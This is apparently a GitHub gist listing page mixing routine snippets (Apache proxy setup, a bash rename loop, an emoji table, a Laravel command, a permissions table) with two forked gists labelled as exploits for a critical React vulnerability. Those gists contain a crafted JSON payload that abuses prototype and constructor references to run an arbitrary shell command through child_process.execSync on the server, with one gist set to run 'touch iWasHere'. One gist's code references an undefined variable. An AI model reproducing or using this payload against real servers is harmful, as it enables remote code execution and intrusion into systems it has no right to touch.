-
sudo a2enmod proxy
-
sudo a2enmod proxy_http
-
sudo a2enmod proxy_balancer
-
sudo a2enmod lbmethod_byrequests
-
sudo a2enmod proxy_wstunnel
-
sudo service apache2 restart
-
sudo nano /etc/apache2/sites-available/000-default.conf
razzul
/ exploit1.js
Created
December 16, 2025 09:12
— forked from akshaymarch7/exploit1.js
React Critical Vulnerability (CVSS 10.0) - exploit1 code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const cmd = "touch iWasHere"; // The command you want to run | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`; |
razzul
/ exploit0.js
Created
December 16, 2025 09:11
— forked from akshaymarch7/exploit0.js
React Critical Vulnerability (CVSS 10.0) - exploit0 code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (async () => { | |
| // === CONFIGURATION === | |
| const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain) | |
| console.log(`[*] Attempting to run command: ${cmd}`); | |
| // 1. Construct the malicious payload | |
| // This injects the command into a child_process.execSync call and throws the result in an error digest | |
| const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`; | |
razzul
/ gist:ff3ed6ec02bf2281d000f649f6e9c9b8
Created
February 15, 2018 11:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Change file name from `_` to `-` | |
| ----------------- | |
| > $ for f in *.json; do mv "$f" "`echo $f | sed s/UTID_/UTID-/`"; done |
People
 :bowtie: |
π :smile: |
π :laughing: |
|---|---|---|
π :blush: |
π :smiley: |
:relaxed: |
π :smirk: |
π :heart_eyes: |
π :kissing_heart: |
π :kissing_closed_eyes: |
π³ :flushed: |
π :relieved: |
π :satisfied: |
π :grin: |
π :wink: |
π :stuck_out_tongue_winking_eye: |
π :stuck_out_tongue_closed_eyes: |
π :grinning: |
π :kissing: |
π :kissing_smiling_eyes: |
π :stuck_out_tongue: |
php artisan make:command QuizStart --command=quiz:start
// /app/console/Kernel.php
protected $commands = [
// Commands\Inspire::class,
'App\Console\Commands\QuizStart'
];
| Symbolic | Notation | Numeric Notation English |
|---|---|---|
| ---------- | 0000 | no permissions |
| -rwx------ | 0700 | read, write, & execute only for owner |
| -rwxrwx--- | 0770 | read, write, & execute for owner and group |
| -rwxrwxrwx | 0777 | read, write, & execute for owner, group and others |
| ---x--x--x | 0111 | execute |
| --w--w--w- | 0222 | write |
razzul
/ array_merge_recursive.md
Last active
November 24, 2017 13:03
array_merge_recursive issue in linux
NewerOlder